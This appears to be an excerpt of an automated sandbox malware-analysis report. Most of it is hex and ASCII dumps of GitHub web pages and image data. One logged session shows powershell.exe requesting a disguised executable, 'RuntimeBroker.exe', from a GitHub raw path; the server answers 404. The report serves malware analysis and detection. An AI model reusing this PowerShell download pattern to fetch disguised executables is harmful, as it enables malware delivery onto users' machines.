                                                                                              Data Ascii: <input type="password" name="password" id="password" class="form-control form-control input-block js-password-field" autocomplete="current-password" /> <input type="hidden" name="trusted_device" id="trusted_device" autocomplete="off" class="form-co
                                                                                              2022-08-10 04:48:03 UTC615INData Raw: 2d 69 6e 2d 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 64 69 73 61 62 6c 65 2d 77 69 74 68 3d 22 53 69 67 6e 69 6e 67 20 69 6e e2 80 a6 22 20 64 61 74 61 2d 73 69 67 6e 69 6e 2d 6c 61 62 65 6c 3d 22 53 69 67 6e 20 69 6e 22 20 64 61 74 61 2d 73 73 6f 2d 6c 61 62 65 6c 3d 22 53 69 67 6e 20 69 6e 20 77 69 74 68 20 79 6f 75 72 20 69 64 65 6e 74 69 74 79 20 70 72 6f 76 69 64 65 72 22 20 64 65 76 65 6c 6f 70 6d 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 61 62 65 6c 2d 6c 69 6e 6b 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 74 6f 70 2d 30 20 72 69 67 68 74 2d 30 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 68 72 65 66 3d 22 2f 70 61 73 73 77 6f 72 64 5f 72 65 73 65 74 22 3e 46 6f 72 67 6f 74 20 70 61 73
                                                                                              Data Ascii: -in-button" data-disable-with="Signing in" data-signin-label="Sign in" data-sso-label="Sign in with your identity provider" development="false" /> <a class="label-link position-absolute top-0 right-0" tabindex="0" href="/password_reset">Forgot pas
                                                                                              2022-08-10 04:48:03 UTC616INData Raw: 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 73 74 61 72 74 2d 6f 66 2d 63 6f 6e 74 65 6e 74 22 20 63 6c 61 73 73 3d 22 73 68 6f 77 2d 6f 6e 2d 66 6f 63 75 73 22 3e 3c 2f 64 69 76 3e 0a 0a 0a 0a 0a 0a 0a 0a 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 70 6a 61 78 2d 72 65 70 6c 61 63 65 20 69 64 3d 22 6a 73 2d 66 6c 61 73 68 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 72 65 70 6c 61 63 65 3e 0a 0a 0a 0a 20 20 3c 74 65 6d 70 6c 61 74 65 20 63 6c 61 73 73 3d 22 6a 73 2d 66 6c 61 73 68 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 20 66 6c 61 73 68 2d 66 75 6c 6c
                                                                                              Data Ascii: > </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full
                                                                                              2022-08-10 04:48:03 UTC618INData Raw: 2d 66 75 6c 6c 20 74 6f 70 2d 30 20 6c 65 66 74 2d 30 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 33 37 30 70 78 22 3e 0a 20 20 20 20 20 20 3c 69 6d 67 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 6a 73 2d 70 6c 61 78 69 66 79 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 22 20 64 61 74 61 2d 69 6e 76 65 72 74 3d 22 74 72 75 65 22 20 64 61 74 61 2d 78 72 61 6e 67 65 3d 22 30 22 20 64 61 74 61 2d 79 72 61 6e 67 65 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 34 31 35 22 20 77 69 64 74 68 3d 22 39 34 30 22 20 73 74 79 6c 65 3d 22 74 6f 70 3a 20 2d 32 30 70 78 3b 20 6c 65 66 74 3a 20 2d 32 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 77 69 64 74 68 3a 20 31 31 30 25 3b 20 68 65 69 67 68 74 3a 20 34 32 35 70 78 22 0a 20 20 20 20 20 20 73 72
                                                                                              Data Ascii: -full top-0 left-0" style="height: 370px"> <img alt="" class="js-plaxify position-absolute" data-invert="true" data-xrange="0" data-yrange="20" height="415" width="940" style="top: -20px; left: -20px; z-index: 1; width: 110%; height: 425px" sr
                                                                                              2022-08-10 04:48:03 UTC619INData Raw: 43 69 6b 4e 6c 65 45 71 6c 78 44 63 71 49 34 32 71 79 36 4f 65 56 41 4e 74 53 69 6d 62 78 32 52 44 4d 54 6f 74 49 6f 41 33 51 36 6f 47 41 38 45 54 4a 68 61 36 30 69 67 74 55 4b 66 45 6c 69 64 56 55 4f 41 35 67 4d 69 55 32 4a 51 71 6d 49 38 45 44 4d 2f 4b 73 54 4f 54 69 30 37 65 43 71 55 34 74 5a 57 46 4e 69 72 68 46 41 4e 56 49 55 77 74 56 69 55 77 43 6f 59 57 71 70 56 42 61 6f 55 77 74 56 51 32 50 44 44 64 41 77 74 33 51 4d 4c 41 4f 55 51 7a 63 4b 34 77 47 41 4b 73 51 77 73 51 4f 4c 4f 45 44 59 4a 68 4d 6d 78 51 68 68 59 71 52 73 46 55 4e 67 67 59 57 38 4b 4c 6a 49 34 68 56 49 4c 4a 44 6d 4e 69 71 44 69 68 52 78 52 4b 4f 48 43 46 4d 4c 44 73 67 4f 48 4b 49 4f 43 4b 4f 43 49 4f 43 47 52 77 55 55 63 46 55 35 42 78 55 4b 32 4b 70 59 4f 43 51 72 59 48 5a 41
                                                                                              Data Ascii: CikNleEqlxDcqI42qy6OeVANtSimbx2RDMTotIoA3Q6oGA8ETJha60igtUKfElidVUOA5gMiU2JQqmI8EDM/KsTOTi07eCqU4tZWFNirhFANVIUwtViUwCoYWqpVBaoUwtVQ2PDDdAwt3QMLAOUQzcK4wGAKsQwsQOLOEDYJhMmxQhhYqRsFUNggYW8KLjI4hVILJDmNiqDihRxRKOHCFMLDsgOHKIOCKOCIOCGRwUUcFU5BxUK2KpYOCQrYHZA
                                                                                              2022-08-10 04:48:03 UTC620INData Raw: 67 4f 50 43 46 62 46 41 63 58 51 62 45 37 49 44 69 55 4f 52 73 55 67 32 50 73 79 44 59 6f 4e 69 55 4b 32 4a 51 48 45 37 49 56 73 54 73 66 42 43 74 67 64 6c 46 48 41 6f 6c 44 43 35 46 6f 2f 54 4b 49 32 43 69 35 62 42 55 72 59 38 49 67 59 6a 5a 52 52 78 2f 79 55 67 32 50 43 52 51 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a
                                                                                              Data Ascii: gOPCFbFAcXQbE7IDiUORsUg2PsyDYoNiUK2JQHE7IVsTsfBCtgdlFHAolDC5Fo/TKI2Ci5bBUrY8IgYjZRRx/yUg2PCRQxGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZ
                                                                                              2022-08-10 04:48:03 UTC621INData Raw: 32 32 45 43 0d 0a 57 77 53 67 34 63 49 67 34 63 49 44 69 71 4e 68 77 6f 6f 34 6c 42 73 55 51 63 45 47 77 52 52 77 53 70 6c 73 46 46 62 46 57 46 6f 34 6c 41 4d 53 6f 44 69 71 59 62 46 42 73 56 49 56 73 65 46 52 73 54 73 6f 6f 34 6e 5a 42 73 4f 45 41 78 56 47 77 43 6c 47 77 43 55 62 41 4a 53 4e 39 4d 49 4e 39 4d 49 4e 39 50 5a 53 72 41 77 34 52 65 55 4d 45 51 75 43 44 59 4b 4e 53 68 67 71 67 47 30 37 4b 4b 32 48 43 41 59 49 42 39 4e 51 44 36 66 4b 69 30 4d 45 41 77 51 44 41 62 49 75 4d 6c 77 47 79 69 67 62 42 73 67 58 41 4b 49 47 43 4b 55 32 71 52 53 34 71 5a 58 42 63 45 6f 55 32 63 4a 56 4c 67 64 6b 4d 46 4e 68 32 51 4b 62 46 46 49 66 54 47 36 4b 58 42 51 78 6b 68 73 43 67 55 32 44 5a 46 70 44 36 59 55 55 68 74 47 6f 55 69 6b 4e 6a 6f 4a 6d 78 51 49 62 55
                                                                                              Data Ascii: 22ECWwSg4cIg4cIDiqNhwoo4lBsUQcEGwRRwSplsFFbFWFo4lAMSoDiqYbFBsVIVseFRsTsoo4nZBsOEAxVGwClGwCUbAJSN9MIN9MIN9PZSrAw4ReUMEQuCDYKNShgqgG07KK2HCAYIB9NQD6fKi0MEAwQDAbIuMlwGyigbBsgXAKIGCKU2qRS4qZXBcEoU2cJVLgdkMFNh2QKbFFIfTG6KXBQxkhsCgU2DZFpD6YUUhtGoUikNjoJmxQIbU
                                                                                              2022-08-10 04:48:03 UTC622INData Raw: 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d 62 4f 46 41 68 43 6d 63 4b 6e 64 61 66 77 55 56 49 32 6f 53 6c 62 33 55 30 55 69 76 47 46 71 37 31 77 71 67 74 56 52 59 57 38 4a 67 79 63 57 75 7a 61 71 6f 74 62 61 50 76 56 52 51 57 70 67 79 6f 4c 56 57 63 72 43 31 6b 44 69 33 75 69 4b 43 31 57 49 6f 4c 56 59 5a 79 70 62 62 52 45 71 6f 74 4e 4b 71 38 68 79 6e 46 70 56 51 34 73 4b 71 48 46 68 4b 71 4b 6a 30 31 4b 48 46 69 42 78 59 67 63 65 6d 45 53 6d 46 6f 45 4d 71 68 78 5a 77 71 48 46 69 42 78 5a 77 6b 53 2f 41 77 74 56 69 48 46 71 59 77 6f 69 31 57 49 62 42 41 77 73 43 70 6e 42 73 52 73 6f 51 63 53 64 46 63 70 67 77 73 4b 5a 4d 5a 4e 39 4d 6f 47 2b 6e 79 67 4f 43 6c 44 59 4b 6f 4f 41 51 4e 67 4e 6b 79 63 6f 34 38 49 5a 77 4f 4b 45 48 45 6f 6f 34 37 4a
                                                                                              Data Ascii: KZ9MKKmbNlFTNvCKmbOFAhCmcKndafwUVI2oSlb3U0UivGFq71wqgtVRYW8JgycWuzaqotbaPvVRQWpgyoLVWcrC1kDi3uiKC1WIoLVYZypbbREqotNKq8hynFpVQ4sKqHFhKqKj01KHFiBxYgcemESmFoEMqhxZwqHFiBxZwkS/AwtViHFqYwoi1WIbBAwsCpnBsRsoQcSdFcpgwsKZMZN9MoG+nygOClDYKoOAQNgNkyco48IZwOKEHEoo47J
                                                                                              2022-08-10 04:48:03 UTC624INData Raw: 55 62 48 6c 52 52 78 51 6a 59 71 6f 32 49 55 57 44 69 46 53 4e 69 45 67 7a 44 5a 52 52 78 34 56 51 63 65 45 49 32 4a 32 53 4b 4f 4a 53 44 59 70 42 73 65 55 42 78 43 51 79 32 49 53 47 42 78 47 79 6d 65 51 35 32 78 34 53 44 4d 68 6a 44 4d 69 78 6d 43 4a 42 5a 41 4d 51 67 4f 49 32 52 57 77 34 55 47 77 56 47 77 35 55 6f 32 47 35 53 67 59 48 64 42 73 45 6f 32 48 44 71 56 51 78 47 79 44 59 42 52 57 77 47 67 43 71 42 67 6f 6f 59 49 42 69 69 78 73 53 68 47 59 37 49 51 4d 65 45 47 77 34 55 41 77 53 68 66 70 6c 52 51 50 70 6f 59 79 48 30 77 68 53 34 42 54 2f 34 76 2f 77 42 44 41 62 4b 4b 47 49 32 51 44 41 49 6c 4b 62 45 55 70 74 55 55 75 4b 42 54 61 69 6c 4e 67 52 43 47 78 46 78 53 6d 77 71 46 49 62 4f 45 55 68 73 55 43 6e 30 39 6c 46 35 45 7a 5a 33 52 53 47 78 52
                                                                                              Data Ascii: UbHlRRxQjYqo2IUWDiFSNiEgzDZRRx4VQceEI2J2SKOJSDYpBseUBxCQy2ISGBxGymeQ52x4SDMhjDMixmCJBZAMQgOI2RWw4UGwVGw5Uo2G5SgYHdBsEo2HDqVQxGyDYBRWwGgCqBgooYIBiixsShGY7IQMeEGw4UAwShfplRQPpoYyH0whS4BT/4v/wBDAbKKGI2QDAIlKbEUptUUuKBTailNgRCGxFxSmwqFIbOEUhsUCn09lF5EzZ3RSGxR
                                                                                              2022-08-10 04:48:03 UTC625INData Raw: 53 71 6c 64 62 34 4a 6c 63 59 53 75 74 51 77 6a 64 61 79 69 70 58 57 4b 4c 55 73 53 6f 31 58 6b 43 33 59 4f 75 7a 7a 71 32 32 48 5a 56 46 37 62 43 65 69 47 46 72 62 47 56 53 71 69 7a 6c 58 43 5a 57 74 73 47 69 75 45 79 72 62 59 72 55 56 46 67 32 52 46 72 62 42 73 69 4b 69 33 5a 58 47 44 4b 67 74 56 52 55 57 6f 6d 54 67 4b 77 55 74 73 56 54 4b 67 74 52 44 43 31 43 48 46 71 47 54 69 33 68 30 51 34 74 4a 30 56 77 5a 77 59 57 48 5a 41 34 39 4d 39 4f 46 52 51 57 66 65 69 47 77 43 51 6f 34 71 6f 59 57 53 67 59 57 44 5a 30 57 6d 46 69 71 43 4c 65 46 41 2b 4a 56 51 63 65 55 49 4f 4b 69 77 57 56 67 4f 4a 32 4b 45 48 41 37 4b 35 79 59 77 62 42 41 63 51 70 53 44 6a 4b 74 51 63 4a 71 73 32 4c 61 4f 43 74 53 74 67 41 64 31 43 6d 78 47 79 55 48 47 4b 4a 52 73 64 34 55
                                                                                              Data Ascii: Sqldb4JlcYSutQwjdayipXWKLUsSo1XkC3YOuzzq22HZVF7bCeiGFrbGVSqizlXCZWtsGiuEyrbYrUVFg2RFrbBsiKi3ZXGDKgtVRUWomTgKwUtsVTKgtRDC1CHFqGTi3h0Q4tJ0VwZwYWHZA49M9OFRQWfeiGwCQo4qoYWSgYWDZ0WmFiqCLeFA+JVQceUIOKiwWVgOJ2KEHA7K5yYwbBAcQpSDjKtQcJqs2LaOCtStgAd1CmxGyUHGKJRsd4U
                                                                                              2022-08-10 04:48:03 UTC626INData Raw: 42 4b 63 35 7a 44 67 55 47 77 4a 51 48 41 38 49 4e 68 30 51 48 42 30 6f 32 4a 36 70 52 73 65 45 6f 77 74 34 54 42 6c 73 66 4a 43 4d 78 66 56 53 72 47 36 68 56 49 7a 42 52 51 59 62 49 4d 41 45 4d 73 77 51 5a 76 46 46 44 45 6f 56 6d 4b 44 4d 55 56 6d 51 6a 4e 43 45 62 45 62 4b 55 67 59 65 43 44 59 64 47 51 44 45 70 52 6d 51 5a 6c 43 73 33 64 41 4d 52 73 6c 47 77 6a 33 49 42 69 6c 49 44 62 71 6b 44 48 5a 51 77 47 50 43 4c 79 46 78 45 6f 6f 47 31 6c 41 46 59 67 45 43 69 79 70 54 61 67 55 32 2b 78 52 61 51 68 46 4b 52 77 70 46 4b 62 55 69 45 4e 76 5a 52 61 6d 62 57 52 61 51 68 51 4a 64 62 32 55 69 31 4d 32 38 4b 69 5a 43 67 6d 62 65 45 56 45 32 71 4e 59 54 49 55 45 62 72 55 56 4b 36 31 53 4b 68 64 61 6f 4a 58 42 52 55 4c 72 55 56 4e 70 51 72 79 72 62 56 30 63
                                                                                              Data Ascii: BKc5zDgUGwJQHA8INh0QHB0o2J6pRseEowt4TBlsfJCMxfVSrG6hVIzBRQYbIMAEMswQZvFFDEoVmKDMUVmQjNCEbEbKUgYeCDYdGQDEpRmQZlCs3dAMRslGwj3IBilIDbqkDHZQwGPCLyFxEooG1lAFYgECiypTagU2+xRaQhFKRwpFKbUiENvZRambWRaQhQJdb2Ui1M28KiZCgmbeEVE2qNYTIUEbrUVK61SKhdaoJXBRULrUVNpQryrbV0c
                                                                                              2022-08-10 04:48:03 UTC628INData Raw: 7a 2b 35 59 7a 78 6d 78 78 69 2f 37 39 50 54 68 63 63 4a 74 73 35 6e 2b 7a 56 30 5a 64 4e 76 37 54 2b 35 61 2f 74 33 36 6e 2f 75 72 2f 41 4c 46 6a 2f 49 63 4e 76 4e 48 61 78 31 74 2f 30 50 45 62 76 56 32 63 39 54 70 48 37 48 2b 38 51 33 37 52 2b 73 4f 33 2b 67 39 54 2f 4e 57 66 38 72 77 6d 2b 30 64 72 54 31 74 66 34 7a 69 39 31 72 37 4f 65 70 30 57 66 79 39 2b 2b 33 68 37 50 32 58 39 66 63 4e 37 66 30 33 71 6e 2f 6d 72 47 66 4f 65 42 30 38 2b 33 32 65 50 35 39 50 57 31 6a 79 6a 6a 64 58 4c 6a 59 62 54 73 61 75 70 30 57 66 79 31 2b 2f 6b 67 66 37 6a 2f 58 68 39 54 2b 6e 39 51 44 78 4e 71 6d 66 50 4f 41 78 2b 76 73 2b 33 70 36 31 78 35 4e 78 2b 65 54 2f 6f 32 6e 59 31 64 53 34 2f 6c 62 2b 59 74 50 32 54 39 62 31 2b 6a 66 38 41 59 73 2f 35 2f 77 41 76 33 2b
                                                                                              Data Ascii: z+5Yzxmxxi/79PThccJts5n+zV0ZdNv7T+5a/t36n/ur/ALFj/IcNvNHax1t/0PEbvV2c9TpH7H+8Q37R+sO3+g9T/NWf8rwm+0drT1tf4zi91r7Oep0Wfy9++3h7P2X9fcN7f03qn/mrGfOeB08+32eP59PW1jyjjdXLjYbTsaup0Wfy1+/kgf7j/Xh9T+n9QDxNqmfPOAx+vs+3p61x5Nx+eT/o2nY1dS4/lb+YtP2T9b1+jf8AYs/5/wAv3+


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              6192.168.11.2049814140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:48:03 UTC404OUTGET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:48:03 UTC404INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:59 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:48:03 UTC405INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:48:03 UTC407INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link
                                                                                              2022-08-10 04:48:03 UTC407INData Raw: 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69
                                                                                              Data Ascii: aws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossori
                                                                                              2022-08-10 04:48:03 UTC408INData Raw: 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73
                                                                                              Data Ascii: egrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_colorblind" cross
                                                                                              2022-08-10 04:48:03 UTC410INData Raw: 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c
                                                                                              Data Ascii: /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.css" /> <
                                                                                              2022-08-10 04:48:03 UTC411INData Raw: 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74
                                                                                              Data Ascii: Rp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" type="applicat
                                                                                              2022-08-10 04:48:03 UTC412INData Raw: 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41 7a 63 56 52 64 35 6c 6b 43 44 30 55
